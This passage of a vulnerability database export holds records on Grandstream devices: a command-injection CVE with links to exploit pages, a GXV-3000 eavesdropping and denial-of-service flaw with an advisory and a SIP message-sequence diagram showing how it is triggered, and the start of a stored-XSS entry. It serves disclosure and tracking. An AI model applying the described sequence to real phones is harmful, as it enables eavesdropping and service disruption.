"url": "http://packetstormsecurity.com/files/165643/grandstream-gxv3175-unauthenticated-command-execution.html"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/165931/grandstream-gxv31xx-settimezone-unauthenticated-command-execution.html"
},
{
"trust": 1.7,
"url": "https://github.com/scarvell/grandstream_exploits"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10655"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10655"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026amp;dl=1"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-142223"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003116"
},
{
"db": "NVD",
"id": "CVE-2019-10655"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1220"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-142223"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003116"
},
{
"db": "NVD",
"id": "CVE-2019-10655"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1220"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-30T00:00:00",
"db": "VULHUB",
"id": "VHN-142223"
},
{
"date": "2019-05-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003116"
},
{
"date": "2019-03-30T17:29:00.353000",
"db": "NVD",
"id": "CVE-2019-10655"
},
{
"date": "2019-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1220"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-142223"
},
{
"date": "2019-05-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003116"
},
{
"date": "2022-04-18T18:12:33.760000",
"db": "NVD",
"id": "CVE-2019-10655"
},
{
"date": "2022-02-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1220"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1220"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Grandstream Product buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003116"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1220"
}
],
"trust": 0.6
}
}
VAR-200708-0292
Vulnerability from variot - Updated: 2023-12-18 13:30The Grandstream SIP Phone GXV-3000 with firmware 1.0.1.7, Loader 1.0.0.6, and Boot 1.0.0.18 allows remote attackers to force silent call completion, eavesdrop on the phone's local environment, and cause a denial of service (blocked call reception) via a certain SIP INVITE message followed by a certain "SIP/2.0 183 Session Progress" message. \"GXV-3000是潮流科技(Grandstream)基于SIP和H.264标准的下一代高级IP视频电话. GXV-3000在处理特定的消息序列时存在漏洞,远程攻击者可能利用此漏洞导致设备不可用. 如果向GXV-3000电话发送了以下两个消息序列的话,就会导致设备拒绝服务:
X ----------------------- INVITE -------------------> GXV-3000 X <------------------ 100 Trying ----------------- GXV-3000 X <--------------- 180 Ringing ------------------- GXV-3000 X ------------- 183 Session Progress -------> GXV-3000 X <-----------RTP - FLOW ------------------------ GXV-3000 \". Grandstream GXV-3000 phones are prone to a remote denial-of-service vulnerability. Exploiting this issue allows remote attackers to cause the device to accept a phone while being unable to hang up. This effectively denies service to legitimate users because further calls will not be accepted by the device. "GXV-3000 is Grandstream's next-generation advanced IP video phone based on SIP and H.264 standards. GXV-3000 has a vulnerability when processing a specific message sequence.
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and categorises it as either Insecure, End-of-Life, or Up-To-Date. Effectively enabling you to focus your attention on software installations where more secure versions are available from the vendors.
Download the free PSI BETA from the Secunia website: https://psi.secunia.com/
TITLE: Grandstream GXV3000 Eavesdropping and Denial of Service Vulnerability
SECUNIA ADVISORY ID: SA26568
VERIFY ADVISORY: http://secunia.com/advisories/26568/
CRITICAL: Moderately critical
IMPACT: Security Bypass, Exposure of sensitive information, DoS
WHERE:
From remote
OPERATING SYSTEM: Grandstream GXV3000 IP Video Phone http://secunia.com/product/15436/
DESCRIPTION: A vulnerability has been reported in the Grandstream GXV3000 IP Video Phone, which can be exploited by malicious people to cause a DoS (Denial of Service) and eavesdrop with vulnerable devices.
The vulnerability is reported in firmware version 1.0.1.7. Other versions may also be affected.
SOLUTION: Reportedly fixed in version 1.0.1.12. Contact the vendor for more information.
PROVIDED AND/OR DISCOVERED BY: Humberto J. Abdelnur, Radu State, and Olivier Festor
ORIGINAL ADVISORY: http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065417.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200708-0292",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "sip phone",
"scope": "eq",
"trust": 1.6,
"vendor": "grandstream",
"version": "gxv-3000"
},
{
"model": "sip phone",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "gxv-3000 boot 1.0.0.18"
},
{
"model": "sip phone",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "loader 1.0.0.6"
},
{
"model": "sip phone",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "firmware 1.0.1.7"
},
{
"model": "gxv-3000",
"scope": "eq",
"trust": 0.3,
"vendor": "grandstream",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "25399"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002547"
},
{
"db": "NVD",
"id": "CVE-2007-4498"
},
{
"db": "CNNVD",
"id": "CNNVD-200708-394"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:sip_phone:gxv-3000:1.0.0.18_boot:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:grandstream:sip_phone:gxv-3000:1.0.0.6_loader:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:grandstream:sip_phone:gxv-3000:1.0.1.7_firmware:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-4498"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Radu State\u203b state@loria.fr",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200708-394"
}
],
"trust": 0.6
},
"cve": "CVE-2007-4498",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 7.8,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2007-4498",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-27860",
"impactScore": 7.8,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2007-4498",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200708-394",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-27860",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-27860"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002547"
},
{
"db": "NVD",
"id": "CVE-2007-4498"
},
{
"db": "CNNVD",
"id": "CNNVD-200708-394"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Grandstream SIP Phone GXV-3000 with firmware 1.0.1.7, Loader 1.0.0.6, and Boot 1.0.0.18 allows remote attackers to force silent call completion, eavesdrop on the phone\u0027s local environment, and cause a denial of service (blocked call reception) via a certain SIP INVITE message followed by a certain \"SIP/2.0 183 Session Progress\" message. \\\"GXV-3000\u662f\u6f6e\u6d41\u79d1\u6280(Grandstream)\u57fa\u4e8eSIP\u548cH.264\u6807\u51c6\u7684\u4e0b\u4e00\u4ee3\u9ad8\u7ea7IP\u89c6\u9891\u7535\u8bdd. \nGXV-3000\u5728\u5904\u7406\u7279\u5b9a\u7684\u6d88\u606f\u5e8f\u5217\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u5bfc\u81f4\u8bbe\u5907\u4e0d\u53ef\u7528. \n\u5982\u679c\u5411GXV-3000\u7535\u8bdd\u53d1\u9001\u4e86\u4ee5\u4e0b\u4e24\u4e2a\u6d88\u606f\u5e8f\u5217\u7684\u8bdd\uff0c\u5c31\u4f1a\u5bfc\u81f4\u8bbe\u5907\u62d2\u7edd\u670d\u52a1\uff1a\n\nX ----------------------- INVITE -------------------\uff1e GXV-3000\nX \uff1c------------------ 100 Trying ----------------- GXV-3000\nX \uff1c--------------- 180 Ringing ------------------- GXV-3000\nX ------------- 183 Session Progress -------\uff1e GXV-3000\nX \uff1c-----------RTP - FLOW ------------------------ GXV-3000\n\\\". Grandstream GXV-3000 phones are prone to a remote denial-of-service vulnerability. \nExploiting this issue allows remote attackers to cause the device to accept a phone while being unable to hang up. This effectively denies service to legitimate users because further calls will not be accepted by the device. \"GXV-3000 is Grandstream\u0027s next-generation advanced IP video phone based on SIP and H.264 standards. GXV-3000 has a vulnerability when processing a specific message sequence. \n----------------------------------------------------------------------\n\nBETA test the new Secunia Personal Software Inspector!\n\nThe Secunia PSI detects installed software on your computer and\ncategorises it as either Insecure, End-of-Life, or Up-To-Date. \nEffectively enabling you to focus your attention on software\ninstallations where more secure versions are available from the\nvendors. \n\nDownload the free PSI BETA from the Secunia website:\nhttps://psi.secunia.com/\n\n----------------------------------------------------------------------\n\nTITLE:\nGrandstream GXV3000 Eavesdropping and Denial of Service Vulnerability\n\nSECUNIA ADVISORY ID:\nSA26568\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/26568/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSecurity Bypass, Exposure of sensitive information, DoS\n\nWHERE:\n\u003eFrom remote\n\nOPERATING SYSTEM:\nGrandstream GXV3000 IP Video Phone\nhttp://secunia.com/product/15436/\n\nDESCRIPTION:\nA vulnerability has been reported in the Grandstream GXV3000 IP Video\nPhone, which can be exploited by malicious people to cause a DoS\n(Denial of Service) and eavesdrop with vulnerable devices. \n\nThe vulnerability is reported in firmware version 1.0.1.7. Other\nversions may also be affected. \n\nSOLUTION:\nReportedly fixed in version 1.0.1.12. Contact the vendor for more\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nHumberto J. Abdelnur, Radu State, and Olivier Festor\n\nORIGINAL ADVISORY:\nhttp://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065417.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-4498"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002547"
},
{
"db": "CNNVD",
"id": "CNNVD-200708-394"
},
{
"db": "BID",
"id": "25399"
},
{
"db": "VULHUB",
"id": "VHN-27860"
},
{
"db": "PACKETSTORM",
"id": "58842"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-27860",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-27860"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-4498",
"trust": 2.8
},
{
"db": "BID",
"id": "25399",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "26568",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "40185",
"trust": 1.7
},
{
"db": "SREASON",
"id": "3059",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1018598",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2007-2970",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002547",
"trust": 0.8
},
{
"db": "XF",
"id": "36170",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20070822 REMOTE EAVESDROPPING WITH SIP PHONE GXV-3000",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200708-394",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-83900",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "30517",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-27860",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "58842",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-27860"
},
{
"db": "BID",
"id": "25399"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002547"
},
{
"db": "PACKETSTORM",
"id": "58842"
},
{
"db": "NVD",
"id": "CVE-2007-4498"
},
{
"db": "CNNVD",
"id": "CNNVD-200708-394"
}
]
},
"id": "VAR-200708-0292",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-27860"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:30:37.378000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002547"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-4498"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-august/065417.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/25399"
},
{
"trust": 1.7,
"url": "http://osvdb.org/40185"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1018598"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/26568"
},
{
"trust": 1.7,
"url": "http://securityreason.com/securityalert/3059"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2007/2970"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36170"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4498"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-4498"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/36170"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2970"
},
{
"trust": 0.3,
"url": "http://www.grandstream.com/gxv3000.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/15436/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/26568/"
},
{
"trust": 0.1,
"url": "https://psi.secunia.com/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-27860"
},
{
"db": "BID",
"id": "25399"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002547"
},
{
"db": "PACKETSTORM",
"id": "58842"
},
{
"db": "NVD",
"id": "CVE-2007-4498"
},
{
"db": "CNNVD",
"id": "CNNVD-200708-394"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-27860"
},
{
"db": "BID",
"id": "25399"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002547"
},
{
"db": "PACKETSTORM",
"id": "58842"
},
{
"db": "NVD",
"id": "CVE-2007-4498"
},
{
"db": "CNNVD",
"id": "CNNVD-200708-394"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-08-23T00:00:00",
"db": "VULHUB",
"id": "VHN-27860"
},
{
"date": "2007-08-22T00:00:00",
"db": "BID",
"id": "25399"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002547"
},
{
"date": "2007-08-25T19:10:39",
"db": "PACKETSTORM",
"id": "58842"
},
{
"date": "2007-08-23T19:17:00",
"db": "NVD",
"id": "CVE-2007-4498"
},
{
"date": "2007-08-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200708-394"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-29T00:00:00",
"db": "VULHUB",
"id": "VHN-27860"
},
{
"date": "2015-05-07T17:35:00",
"db": "BID",
"id": "25399"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002547"
},
{
"date": "2017-07-29T01:32:58.647000",
"db": "NVD",
"id": "CVE-2007-4498"
},
{
"date": "2007-08-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200708-394"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200708-394"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream SIP Phone GXV 3000 Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002547"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "25399"
},
{
"db": "CNNVD",
"id": "CNNVD-200708-394"
}
],
"trust": 0.9
}
}
VAR-201711-0061
Vulnerability from variot - Updated: 2023-12-18 13:24Stored Cross-site scripting (XSS) vulnerability in /cgi-bin/config2 on Vonage (Grandstream) HT802 devices allows remote authenticated users to inject arbitrary web script or HTML via the DHCP vendor class ID field (P148). Vonage (Grandstream) HT802 The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Vonage (Grandstream) HT802devices is a home gateway device from Vonage, USA
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201711-0061",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ht802",
"scope": "eq",
"trust": 1.6,
"vendor": "grandstream",
"version": null
},
{
"model": "ht802",
"scope": null,
"trust": 0.8,
"vendor": "grandstream",
"version": null
},
{
"model": "ht802",
"scope": null,
"trust": 0.6,
"vendor": "vonage",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36347"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009937"
},
{
"db": "NVD",
"id": "CVE-2017-16564"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-200"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ht802_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ht802:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-16564"
}
]
},
"cve": "CVE-2017-16564",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
